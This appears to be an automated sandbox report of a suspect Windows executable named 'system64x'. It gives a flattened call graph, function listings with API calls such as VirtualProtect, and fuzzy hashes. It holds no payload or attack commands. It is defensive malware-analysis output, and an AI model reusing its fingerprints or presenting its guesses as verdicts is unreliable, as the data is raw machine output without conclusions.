4228->4229 4230 7ff762441394 2 API calls 4228->4230 4231 7ff762441394 2 API calls 4229->4231 4230->4229 4232 7ff762441558 4231->4232 4233 7ff76244155d 4232->4233 4234 7ff762441394 2 API calls 4232->4234 4235 7ff762441394 2 API calls 4233->4235 4234->4233 4236 7ff762441567 4235->4236 4237 7ff76244156c 4236->4237 4238 7ff762441394 2 API calls 4236->4238 4239 7ff762441394 2 API calls 4237->4239 4238->4237 4240 7ff762441576 4239->4240 4241 7ff76244157b 4240->4241 4242 7ff762441394 2 API calls 4240->4242 4243 7ff762441394 2 API calls 4241->4243 4242->4241 4244 7ff762441585 4243->4244 4245 7ff76244158a 4244->4245 4246 7ff762441394 2 API calls 4244->4246 4247 7ff762441394 2 API calls 4245->4247 4246->4245 4248 7ff762441599 4247->4248 4249 7ff762441394 2 API calls 4248->4249 4250 7ff7624415a3 4249->4250 4251 7ff762441394 2 API calls 4250->4251 4252 7ff7624415a8 4251->4252 4253 7ff762441394 2 API calls 4252->4253 4254 7ff7624415b7 4253->4254 4255 7ff762441394 2 API calls 4254->4255 4256 7ff7624415c6 4255->4256 4257 7ff762441394 2 API calls 4256->4257 4258 7ff7624415d5 4257->4258 4259 7ff762441394 2 API calls 4258->4259 4260 7ff7624415e4 4259->4260 4261 7ff762441394 2 API calls 4260->4261 4262 7ff7624415f3 4261->4262 4262->3700 4264 7ff762441394 2 API calls 4263->4264 4265 7ff76244143b 4264->4265 4266 7ff762441440 4265->4266 4267 7ff762441394 2 API calls 4265->4267 4268 7ff762441394 2 API calls 4266->4268 4267->4266 4269 7ff76244144f 4268->4269 4270 7ff76244145e 4269->4270 4271 7ff762441394 2 API calls 4269->4271 4272 7ff762441394 2 API calls 4270->4272 4271->4270 4273 7ff762441468 4272->4273 4274 7ff76244146d 4273->4274 4275 7ff762441394 2 API calls 4273->4275 4276 7ff762441394 2 API calls 4274->4276 4275->4274 4277 7ff762441477 4276->4277 4278 7ff76244147c 4277->4278 4279 7ff762441394 2 API calls 4277->4279 4280 7ff762441394 2 API calls 4278->4280 4279->4278 4281 7ff762441486 4280->4281 4282 7ff76244148b 4281->4282 4283 7ff762441394 2 API calls 4281->4283 4284 7ff762441394 2 API calls 4282->4284 4283->4282 4285 7ff762441495 4284->4285 4286 7ff762441394 2 API calls 4285->4286 4287 7ff76244149a 4286->4287 4288 7ff762441394 2 API calls 4287->4288 4289 7ff7624414a9 4288->4289 4290 7ff762441394 2 API calls 4289->4290 4291 7ff7624414b8 4290->4291 4292 7ff762441394 2 API calls 4291->4292 4293 7ff7624414c7 4292->4293 4294 7ff762441394 2 API calls 4293->4294 4295 7ff7624414d6 4294->4295 4296 7ff762441394 2 API calls 4295->4296 4297 7ff7624414e5 4296->4297 4298 7ff762441394 2 API calls 4297->4298 4299 7ff7624414f4 4298->4299 4300 7ff762441394 2 API calls 4299->4300 4301 7ff762441503 4300->4301 4302 7ff762441394 2 API calls 4301->4302 4303 7ff762441512 4302->4303 4304 7ff762441394 2 API calls 4303->4304 4305 7ff762441521 4304->4305 4306 7ff762441530 4305->4306 4307 7ff762441394 2 API calls 4305->4307 4308 7ff762441394 2 API calls 4306->4308 4307->4306 4309 7ff76244153a 4308->4309 4310 7ff762441394 2 API calls 4309->4310 4311 7ff76244153f 4310->4311 4312 7ff76244154e 4311->4312 4313 7ff762441394 2 API calls 4311->4313 4314 7ff762441394 2 API calls 4312->4314 4313->4312 4315 7ff762441558 4314->4315 4316 7ff76244155d 4315->4316 4317 7ff762441394 2 API calls 4315->4317 4318 7ff762441394 2 API calls 4316->4318 4317->4316 4319 7ff762441567 4318->4319 4320 7ff76244156c 4319->4320 4321 7ff762441394 2 API calls 4319->4321 4322 7ff762441394 2 API calls 4320->4322 4321->4320 4323 7ff762441576 4322->4323 4324 7ff76244157b 4323->4324 4325 7ff762441394 2 API calls 4323->4325 4326 7ff762441394 2 API calls 4324->4326 4325->4324 4327 7ff762441585 4326->4327 4328 7ff76244158a 4327->4328 4329 7ff762441394 2 API calls 4327->4329 4330 7ff762441394 2 API calls 4328->4330 4329->4328 4331 7ff762441599 4330->4331 4332 7ff762441394 2 API calls 4331->4332 4333 7ff7624415a3 4332->4333 4334 7ff762441394 2 API calls 4333->4334 4335 7ff7624415a8 4334->4335 4336 7ff762441394 2 API calls 4335->4336 4337 7ff7624415b7 4336->4337 4338 7ff762441394 2 API calls 4337->4338 4339 7ff7624415c6 4338->4339 4340 7ff762441394 2 API calls 4339->4340 4341 7ff7624415d5 4340->4341 4342 7ff762441394 2 API calls 4341->4342 4343 7ff7624415e4 4342->4343 4344 7ff762441394 2 API calls 4343->4344 4345 7ff7624415f3 4344->4345 4345->3703 4347 7ff762441394 2 API calls 4346->4347 4348 7ff7624414c7 4347->4348 4349 7ff762441394 2 API calls 4348->4349 4350 7ff7624414d6 4349->4350 4351 7ff762441394 2 API calls 4350->4351 4352 7ff7624414e5 4351->4352 4353 7ff762441394 2 API calls 4352->4353 4354 7ff7624414f4 4353->4354 4355 7ff762441394 2 API calls 4354->4355 4356 7ff762441503 4355->4356 4357 7ff762441394 2 API calls 4356->4357 4358 7ff762441512 4357->4358 4359 7ff762441394 2 API calls 4358->4359 4360 7ff762441521 4359->4360 4361 7ff762441530 4360->4361 4362 7ff762441394 2 API calls 4360->4362 4363 7ff762441394 2 API calls 4361->4363 4362->4361 4364 7ff76244153a 4363->4364 4365 7ff762441394 2 API calls 4364->4365 4366 7ff76244153f 4365->4366 4367 7ff76244154e 4366->4367 4368 7ff762441394 2 API calls 4366->4368 4369 7ff762441394 2 API calls 4367->4369 4368->4367 4370 7ff762441558 4369->4370 4371 7ff76244155d 4370->4371 4372 7ff762441394 2 API calls 4370->4372 4373 7ff762441394 2 API calls 4371->4373 4372->4371 4374 7ff762441567 4373->4374 4375 7ff76244156c 4374->4375 4376 7ff762441394 2 API calls 4374->4376 4377 7ff762441394 2 API calls 4375->4377 4376->4375 4378 7ff762441576 4377->4378 4379 7ff76244157b 4378->4379 4380 7ff762441394 2 API calls 4378->4380 4381 7ff762441394 2 API calls 4379->4381 4380->4379 4382 7ff762441585 4381->4382 4383 7ff76244158a 4382->4383 4384 7ff762441394 2 API calls 4382->4384 4385 7ff762441394 2 API calls 4383->4385 4384->4383 4386 7ff762441599 4385->4386 4387 7ff762441394 2 API calls 4386->4387 4388 7ff7624415a3 4387->4388 4389 7ff762441394 2 API calls 4388->4389 4390 7ff7624415a8 4389->4390 4391 7ff762441394 2 API calls 4390->4391 4392 7ff7624415b7 4391->4392 4393 7ff762441394 2 API calls 4392->4393 4394 7ff7624415c6 4393->4394 4395 7ff762441394 2 API calls 4394->4395 4396 7ff7624415d5 4395->4396 4397 7ff762441394 2 API calls 4396->4397 4398 7ff7624415e4 4397->4398 4399 7ff762441394 2 API calls 4398->4399 4400 7ff7624415f3 4399->4400 4400->3775 4402 7ff762441394 2 API calls 4401->4402 4403 7ff7624415e4 4402->4403 4404 7ff762441394 2 API calls 4403->4404 4405 7ff7624415f3 4404->4405 4405->3775 4407 7ff762441394 2 API calls 4406->4407 4408 7ff762441495 4407->4408 4409 7ff762441394 2 API calls 4408->4409 4410 7ff76244149a 4409->4410 4411 7ff762441394 2 API calls 4410->4411 4412 7ff7624414a9 4411->4412 4413 7ff762441394 2 API calls 4412->4413 4414 7ff7624414b8 4413->4414 4415 7ff762441394 2 API calls 4414->4415 4416 7ff7624414c7 4415->4416 4417 7ff762441394 2 API calls 4416->4417 4418 7ff7624414d6 4417->4418 4419 7ff762441394 2 API calls 4418->4419 4420 7ff7624414e5 4419->4420 4421 7ff762441394 2 API calls 4420->4421 4422 7ff7624414f4 4421->4422 4423 7ff762441394 2 API calls 4422->4423 4424 7ff762441503 4423->4424 4425 7ff762441394 2 API calls 4424->4425 4426 7ff762441512 4425->4426 4427 7ff762441394 2 API calls 4426->4427 4428 7ff762441521 4427->4428 4429 7ff762441530 4428->4429 4430 7ff762441394 2 API calls 4428->4430 4431 7ff762441394 2 API calls 4429->4431 4430->4429 4432 7ff76244153a 4431->4432 4433 7ff762441394 2 API calls 4432->4433 4434 7ff76244153f 4433->4434 4435 7ff76244154e 4434->4435 4436 7ff762441394 2 API calls 4434->4436 4437 7ff762441394 2 API calls 4435->4437 4436->4435 4438 7ff762441558 4437->4438 4439 7ff76244155d 4438->4439 4440 7ff762441394 2 API calls 4438->4440 4441 7ff762441394 2 API calls 4439->4441 4440->4439 4442 7ff762441567 4441->4442 4443 7ff76244156c 4442->4443 4444 7ff762441394 2 API calls 4442->4444 4445 7ff762441394 2 API calls 4443->4445 4444->4443 4446 7ff762441576 4445->4446 4447 7ff76244157b 4446->4447 4448 7ff762441394 2 API calls 4446->4448 4449 7ff762441394 2 API calls 4447->4449 4448->4447 4450 7ff762441585 4449->4450 4451 7ff76244158a 4450->4451 4452 7ff762441394 2 API calls 4450->4452 4453 7ff762441394 2 API calls 4451->4453 4452->4451 4454 7ff762441599 4453->4454 4455 7ff762441394 2 API calls 4454->4455 4456 7ff7624415a3 4455->4456 4457 7ff762441394 2 API calls 4456->4457 4458 7ff7624415a8 4457->4458 4459 7ff762441394 2 API calls 4458->4459 4460 7ff7624415b7 4459->4460 4461 7ff762441394 2 API calls 4460->4461 4462 7ff7624415c6 4461->4462 4463 7ff762441394 2 API calls 4462->4463 4464 7ff7624415d5 4463->4464 4465 7ff762441394 2 API calls 4464->4465 4466 7ff7624415e4 4465->4466 4467 7ff762441394 2 API calls 4466->4467 4468 7ff7624415f3 4467->4468 4468->3767 4469 7ff76244149a 4468->4469 4470 7ff762441394 2 API calls 4469->4470 4471 7ff7624414a9 4470->4471 4472 7ff762441394 2 API calls 4471->4472 4473 7ff7624414b8 4472->4473 4474 7ff762441394 2 API calls 4473->4474 4475 7ff7624414c7 4474->4475 4476 7ff762441394 2 API calls 4475->4476 4477 7ff7624414d6 4476->4477 4478 7ff762441394 2 API calls 4477->4478 4479 7ff7624414e5 4478->4479 4480 7ff762441394 2 API calls 4479->4480 4481 7ff7624414f4 4480->4481 4482 7ff762441394 2 API calls 4481->4482 4483 7ff762441503 4482->4483 4484 7ff762441394 2 API calls 4483->4484 4485 7ff762441512 4484->4485 4486 7ff762441394 2 API calls 4485->4486 4487 7ff762441521 4486->4487 4488 7ff762441530 4487->4488 4489 7ff762441394 2 API calls 4487->4489 4490 7ff762441394 2 API calls 4488->4490 4489->4488 4491 7ff76244153a 4490->4491 4492 7ff762441394 2 API calls 4491->4492 4493 7ff76244153f 4492->4493 4494 7ff76244154e 4493->4494 4495 7ff762441394 2 API calls 4493->4495 4496 7ff762441394 2 API calls 4494->4496 4495->4494 4497 7ff762441558 4496->4497 4498 7ff76244155d 4497->4498 4499 7ff762441394 2 API calls 4497->4499 4500 7ff762441394 2 API calls 4498->4500 4499->4498 4501 7ff762441567 4500->4501 4502 7ff76244156c 4501->4502 4503 7ff762441394 2 API calls 4501->4503 4504 7ff762441394 2 API calls 4502->4504 4503->4502 4505 7ff762441576 4504->4505 4506 7ff76244157b 4505->4506 4507 7ff762441394 2 API calls 4505->4507 4508 7ff762441394 2 API calls 4506->4508 4507->4506 4509 7ff762441585 4508->4509 4510 7ff76244158a 4509->4510 4511 7ff762441394 2 API calls 4509->4511 4512 7ff762441394 2 API calls 4510->4512 4511->4510 4513 7ff762441599 4512->4513 4514 7ff762441394 2 API calls 4513->4514 4515 7ff7624415a3 4514->4515 4516 7ff762441394 2 API calls 4515->4516 4517 7ff7624415a8 4516->4517 4518 7ff762441394 2 API calls 4517->4518 4519 7ff7624415b7 4518->4519 4520 7ff762441394 2 API calls 4519->4520 4521 7ff7624415c6 4520->4521 4522 7ff762441394 2 API calls 4521->4522 4523 7ff7624415d5 4522->4523 4524 7ff762441394 2 API calls 4523->4524 4525 7ff7624415e4 4524->4525 4526 7ff762441394 2 API calls 4525->4526 4527 7ff7624415f3 4526->4527 4527->3767 4527->3778 4529 7ff762441394 2 API calls 4528->4529 4530 7ff762441486 4529->4530 4531 7ff76244148b 4530->4531 4532 7ff762441394 2 API calls 4530->4532 4533 7ff762441394 2 API calls 4531->4533 4532->4531 4534 7ff762441495 4533->4534 4535 7ff762441394 2 API calls 4534->4535 4536 7ff76244149a 4535->4536 4537 7ff762441394 2 API calls 4536->4537 4538 7ff7624414a9 4537->4538 4539 7ff762441394 2 API calls 4538->4539 4540 7ff7624414b8 4539->4540 4541 7ff762441394 2 API calls 4540->4541 4542 7ff7624414c7 4541->4542 4543 7ff762441394 2 API calls 4542->4543 4544 7ff7624414d6 4543->4544 4545 7ff762441394 2 API calls 4544->4545 4546 7ff7624414e5 4545->4546 4547 7ff762441394 2 API calls 4546->4547 4548 7ff7624414f4 4547->4548 4549 7ff762441394 2 API calls 4548->4549 4550 7ff762441503 4549->4550 4551 7ff762441394 2 API calls 4550->4551 4552 7ff762441512 4551->4552 4553 7ff762441394 2 API calls 4552->4553 4554 7ff762441521 4553->4554 4555 7ff762441530 4554->4555 4556 7ff762441394 2 API calls 4554->4556 4557 7ff762441394 2 API calls 4555->4557 4556->4555 4558 7ff76244153a 4557->4558 4559 7ff762441394 2 API calls 4558->4559 4560 7ff76244153f 4559->4560 4561 7ff76244154e 4560->4561 4562 7ff762441394 2 API calls 4560->4562 4563 7ff762441394 2 API calls 4561->4563 4562->4561 4564 7ff762441558 4563->4564 4565 7ff76244155d 4564->4565 4566 7ff762441394 2 API calls 4564->4566 4567 7ff762441394 2 API calls 4565->4567 4566->4565 4568 7ff762441567 4567->4568 4569 7ff76244156c 4568->4569 4570 7ff762441394 2 API calls 4568->4570 4571 7ff762441394 2 API calls 4569->4571 4570->4569 4572 7ff762441576 4571->4572 4573 7ff76244157b 4572->4573 4574 7ff762441394 2 API calls 4572->4574 4575 7ff762441394 2 API calls 4573->4575 4574->4573 4576 7ff762441585 4575->4576 4577 7ff76244158a 4576->4577 4578 7ff762441394 2 API calls 4576->4578 4579 7ff762441394 2 API calls 4577->4579 4578->4577 4580 7ff762441599 4579->4580 4581 7ff762441394 2 API calls 4580->4581 4582 7ff7624415a3 4581->4582 4583 7ff762441394 2 API calls 4582->4583 4584 7ff7624415a8 4583->4584 4585 7ff762441394 2 API calls 4584->4585 4586 7ff7624415b7 4585->4586 4587 7ff762441394 2 API calls 4586->4587 4588 7ff7624415c6 4587->4588 4589 7ff762441394 2 API calls 4588->4589 4590 7ff7624415d5 4589->4590 4591 7ff762441394 2 API calls 4590->4591 4592 7ff7624415e4 4591->4592 4593 7ff762441394 2 API calls 4592->4593 4594 7ff7624415f3 4593->4594 4594->3783 4596 7ff762441394 2 API calls 4595->4596 4597 7ff7624415d5 4596->4597 4598 7ff762441394 2 API calls 4597->4598 4599 7ff7624415e4 4598->4599 4600 7ff762441394 2 API calls 4599->4600 4601 7ff7624415f3 4600->4601 4601->3784 4603 7ff762441394 2 API calls 4602->4603 4604 7ff76244141d 4603->4604 4605 7ff762441422 4604->4605 4606 7ff762441394 2 API calls 4604->4606 4607 7ff762441394 2 API calls 4605->4607 4606->4605 4608 7ff76244142c 4607->4608 4609 7ff762441431 4608->4609 4610 7ff762441394 2 API calls 4608->4610 4611 7ff762441394 2 API calls 4609->4611 4610->4609 4612 7ff76244143b 4611->4612 4613 7ff762441440 4612->4613 4614 7ff762441394 2 API calls 4612->4614 4615 7ff762441394 2 API calls 4613->4615 4614->4613 4616 7ff76244144f 4615->4616 4617 7ff76244145e 4616->4617 4618 7ff762441394 2 API calls 4616->4618 4619 7ff762441394 2 API calls 4617->4619 4618->4617 4620 7ff762441468 4619->4620 4621 7ff76244146d 4620->4621 4622 7ff762441394 2 API calls 4620->4622 4623 7ff762441394 2 API calls 4621->4623 4622->4621 4624 7ff762441477 4623->4624 4625 7ff76244147c 4624->4625 4626 7ff762441394 2 API calls 4624->4626 4627 7ff762441394 2 API calls 4625->4627 4626->4625 4628 7ff762441486 4627->4628 4629 7ff76244148b 4628->4629 4630 7ff762441394 2 API calls 4628->4630 4631 7ff762441394 2 API calls 4629->4631 4630->4629 4632 7ff762441495 4631->4632 4633 7ff762441394 2 API calls 4632->4633 4634 7ff76244149a 4633->4634 4635 7ff762441394 2 API calls 4634->4635 4636 7ff7624414a9 4635->4636 4637 7ff762441394 2 API calls 4636->4637 4638 7ff7624414b8 4637->4638 4639 7ff762441394 2 API calls 4638->4639 4640 7ff7624414c7 4639->4640 4641 7ff762441394 2 API calls 4640->4641 4642 7ff7624414d6 4641->4642 4643 7ff762441394 2 API calls 4642->4643 4644 7ff7624414e5 4643->4644 4645 7ff762441394 2 API calls 4644->4645 4646 7ff7624414f4 4645->4646 4647 7ff762441394 2 API calls 4646->4647 4648 7ff762441503 4647->4648 4649 7ff762441394 2 API calls 4648->4649 4650 7ff762441512 4649->4650 4651 7ff762441394 2 API calls 4650->4651 4652 7ff762441521 4651->4652 4653 7ff762441530 4652->4653 4654 7ff762441394 2 API calls 4652->4654 4655 7ff762441394 2 API calls 4653->4655 4654->4653 4656 7ff76244153a 4655->4656 4657 7ff762441394 2 API calls 4656->4657 4658 7ff76244153f 4657->4658 4659 7ff76244154e 4658->4659 4660 7ff762441394 2 API calls 4658->4660 4661 7ff762441394 2 API calls 4659->4661 4660->4659 4662 7ff762441558 4661->4662 4663 7ff76244155d 4662->4663 4664 7ff762441394 2 API calls 4662->4664 4665 7ff762441394 2 API calls 4663->4665 4664->4663 4666 7ff762441567 4665->4666 4667 7ff76244156c 4666->4667 4668 7ff762441394 2 API calls 4666->4668 4669 7ff762441394 2 API calls 4667->4669 4668->4667 4670 7ff762441576 4669->4670 4671 7ff76244157b 4670->4671 4672 7ff762441394 2 API calls 4670->4672 4673 7ff762441394 2 API calls 4671->4673 4672->4671 4674 7ff762441585 4673->4674 4675 7ff76244158a 4674->4675 4676 7ff762441394 2 API calls 4674->4676 4677 7ff762441394 2 API calls 4675->4677 4676->4675 4678 7ff762441599 4677->4678 4679 7ff762441394 2 API calls 4678->4679 4680 7ff7624415a3 4679->4680 4681 7ff762441394 2 API calls 4680->4681 4682 7ff7624415a8 4681->4682 4683 7ff762441394 2 API calls 4682->4683 4684 7ff7624415b7 4683->4684 4685 7ff762441394 2 API calls 4684->4685 4686 7ff7624415c6 4685->4686 4687 7ff762441394 2 API calls 4686->4687 4688 7ff7624415d5 4687->4688 4689 7ff762441394 2 API calls 4688->4689 4690 7ff7624415e4 4689->4690 4691 7ff762441394 2 API calls 4690->4691 4692 7ff7624415f3 4691->4692 4692->3842 4726 7ff762441000 4727 7ff76244108b __set_app_type 4726->4727 4728 7ff762441040 4726->4728 4729 7ff7624410b6 4727->4729 4728->4727 4730 7ff7624410e5 4729->4730 4732 7ff762441e00 4729->4732 4733 7ff762448d40 __setusermatherr 4732->4733 4734 7ff762441800 4735 7ff762441812 4734->4735 4736 7ff762441835 fprintf 4735->4736 4760 7ff762442320 strlen 4761 7ff762442337 4760->4761 4704 7ff762441e65 4705 7ff762441e67 signal 4704->4705 4706 7ff762441e7c 4705->4706 4708 7ff762441e99 4705->4708 4707 7ff762441e82 signal 4706->4707 4706->4708 4707->4708 4737 7ff762442104 4738 7ff762442111 EnterCriticalSection 4737->4738 4740 7ff762442218 4737->4740 4741 7ff76244220b LeaveCriticalSection 4738->4741 4745 7ff76244212e 4738->4745 4739 7ff762442272 4740->4739 4742 7ff762442241 DeleteCriticalSection 4740->4742 4744 7ff762442230 free 4740->4744 4741->4740 4742->4739 4743 7ff76244214d TlsGetValue GetLastError 4743->4745 4744->4742 4744->4744 4745->4741 4745->4743 4785 7ff762441ac3 4786 7ff762441a70 4785->4786 4787 7ff762441b36 4786->4787 4788 7ff76244199e 4786->4788 4791 7ff762441b53 4786->4791 4790 7ff762441ba0 4 API calls 4787->4790 4789 7ff762441a0f 4788->4789 4792 7ff7624419e9 VirtualProtect 4788->4792 4790->4791 4792->4788

                                                                          Executed Functions

                                                                          Function 00007FF762441160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID:
                                                                          • API String ID: 2643109117-0
                                                                          • Opcode ID: c996e7a35bf803568ca43188fa743fd5e2d0011960c1ad381c257ca82b16660a
                                                                          • Instruction ID: aec390b347d325cfd779a5552e7f76f4da732c4c6f2b63f6d36a239ad3089e28
                                                                          • Opcode Fuzzy Hash: c996e7a35bf803568ca43188fa743fd5e2d0011960c1ad381c257ca82b16660a
                                                                          • Instruction Fuzzy Hash: DF514C31A19646C5FE91BB15E950379ABA2FF48780FC48031C90D977A2DFACBC59C760
                                                                          Function 00007FF762441394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtCloseObjectAuditAlarm.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF762441156), ref: 00007FF7624413F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: AlarmAuditCloseObject
                                                                          • String ID:
                                                                          • API String ID: 2871759311-0
                                                                          • Opcode ID: 780e7118a6cfb6d36c84ad4db31f8807fd0b8417d9b6a87ee28a6c59f42cfa84
                                                                          • Instruction ID: 4c600914615dd10df9b5a087d1ded2f7018fd2782cf10b635c997d03dfdd2b9c
                                                                          • Opcode Fuzzy Hash: 780e7118a6cfb6d36c84ad4db31f8807fd0b8417d9b6a87ee28a6c59f42cfa84
                                                                          • Instruction Fuzzy Hash: 62F0C971D09B45C2DA54EB51F85042EBB60FB48385B404435E99C43725DFBCE854CF60

                                                                          Non-executed Functions

                                                                          Function 00007FF762443350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: memset$wcscatwcscpywcslen
                                                                          • String ID: $0$0$@$@
                                                                          • API String ID: 4263182637-1413854666
                                                                          • Opcode ID: 1ebfceb6ccbc61bfdc6d1d73518e072520c38c1920a0aba60a62dff29e637d97
                                                                          • Instruction ID: 14a2121c81449dda447dfdb37487bd833b50a17993be9acc7c092749a90725ac
                                                                          • Opcode Fuzzy Hash: 1ebfceb6ccbc61bfdc6d1d73518e072520c38c1920a0aba60a62dff29e637d97
                                                                          • Instruction Fuzzy Hash: FEB1C32190C6C2C5FBA1AB14E4453FAFBA1FF80744F944235EA8C42AA5DFBDE549CB50
                                                                          Function 00007FF762442690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                          • String ID: 0$X$`
                                                                          • API String ID: 329590056-2527496196
                                                                          • Opcode ID: 8dd9b4d9794abecbbce3b974b874b08a77c89a1688d8793b7a9d9c155a3acde6
                                                                          • Instruction ID: e7442feb45efff10903a91c90b4f7da95675dfa82c5c679b813789651da8d5ed
                                                                          • Opcode Fuzzy Hash: 8dd9b4d9794abecbbce3b974b874b08a77c89a1688d8793b7a9d9c155a3acde6
                                                                          • Instruction Fuzzy Hash: 5A02A522908BC5C1EBA0DB15E8443AABBA1FB85794F844335DA9C43BE5DFBCE548C750
                                                                          Function 00007FF762441BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF76244A694,00007FF76244A694,?,?,00007FF762440000,?,00007FF762441991), ref: 00007FF762441C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF76244A694,00007FF76244A694,?,?,00007FF762440000,?,00007FF762441991), ref: 00007FF762441CC7
                                                                          • memcpy.MSVCRT ref: 00007FF762441CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,00007FF76244A694,00007FF76244A694,?,?,00007FF762440000,?,00007FF762441991), ref: 00007FF762441D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: 8a554a6fa389011197ec1d316fb9bfbcb4cc07135e3b9ec9b47a0c356bf0b17d
                                                                          • Instruction ID: e186b1fab2b2673d6d16ae1e8d2d2d3b4b3ac9d79055f46793f926b25d8599ab
                                                                          • Opcode Fuzzy Hash: 8a554a6fa389011197ec1d316fb9bfbcb4cc07135e3b9ec9b47a0c356bf0b17d
